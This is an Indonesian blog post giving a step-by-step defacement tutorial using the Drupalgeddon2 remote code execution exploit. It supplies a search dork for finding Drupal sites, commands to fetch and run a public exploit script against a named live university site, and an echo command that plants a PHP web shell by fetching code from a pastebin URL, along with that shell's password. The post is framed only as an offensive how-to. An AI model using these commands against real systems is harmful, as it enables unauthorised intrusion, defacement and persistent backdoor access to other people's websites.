Senin, 23 April 2018

Drupal Geddon - RCE (Remote Code Execution)

Drupal Geddon - RCE (Remote Code Execution)
April 23, 2018
Add Comment

Halo guys...

   Kali ini saya akan memberi tutorial bagaimana deface menggunakan RCE Drupal. Ya langsung saja :

Dork : intext:"powered by drupal" (kembangkan)

Buka Termux/Terminal :
pkg install git
gem install ruby
github.com/dreadlocked/Drupalgeddon2

Buka Folder nya :

cd  Drupalgeddon2

Cara menjalankan nya :

ruby drupalgeddon2.rb target.com

Contoh live :

ruby drupalgeddon2.rb http://school.unklab.ac.id
Jika berhasil, web tersebut akan connect ke terminal kalian.


Cek lah dengan perintah

uname -a


 Jika muncul kernel nya berarti berhasil.

Langsung saja kita upload shell kita , disini saya menggunakan shell LamonganXploiter, kalian juga bisa mengubah shell nya, cara upload nya kalian hanya tinggal ketik :

echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/en5tp4kX"));?>' > shell.php

Setelah terupload langsung saja kita cek shell kita di site.com/shell.php

Note*
Password Shell LAX adalah " LAX "

Mudah bukan?, Sampai Jumpa :D
By -
Tags : , ,
Share This :
SUBSCRIBE TO OUR NEWSLETTER

Add Your Comments

bold <b>b</b>
italic <i>i</i>
underline <u>u</u>
HTML<code></code> use Parser

Emoticon
Parser
😊
πŸ˜‰
πŸ˜€
😁
😎
😍
😜
πŸ˜‘
πŸ˜‡
πŸ’–
😯
😱
😭
πŸ‘
🍻
Langganan: Posting Komentar (Atom)